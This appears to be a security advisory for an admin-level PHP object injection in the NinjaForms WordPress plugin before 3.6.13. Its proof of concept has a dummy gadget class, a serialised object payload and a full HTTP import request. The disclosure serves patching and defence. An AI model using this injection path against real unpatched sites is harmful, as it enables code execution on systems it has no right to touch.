NinjaForms < 3.6.13 - Admin+ PHP Objection Injection

The plugin unserialises the content of an imported file, which could lead to PHP object injections issues when an admin import (intentionally or not) a malicious file and a suitable gadget chain is present on the blog.

PoC

To simulate a gadget chain, put the following code in a plugin class Evil { public function __wakeup() : void { die(“Arbitrary deserialization”); } } Then import a file with the following content via Import / Export > Favourite Fields (/wp-admin/admin.php?page=nf-import-export&tab;=favorite_fields): O:4:“Evil”:0:{}; POST /wp-admin/admin.php?page=nf-import-export&tab;=favorite_fields HTTP/1.1 Content-Length: 336 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryKFuobGrwagXg1r1n Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Encoding: gzip, deflate Accept-Language: en-GB,en-US;q=0.9,en;q=0.8 Cookie: Admin+ Connection: close ------WebKitFormBoundaryKFuobGrwagXg1r1n Content-Disposition: form-data; name=“nf_import_fields”; filename=“test” Content-Type: application/octet-stream O:4:“Evil”:0:{}; ------WebKitFormBoundaryKFuobGrwagXg1r1n Content-Disposition: form-data; name=“nf_import_security” 252edff6dd ------WebKitFormBoundaryKFuobGrwagXg1r1n–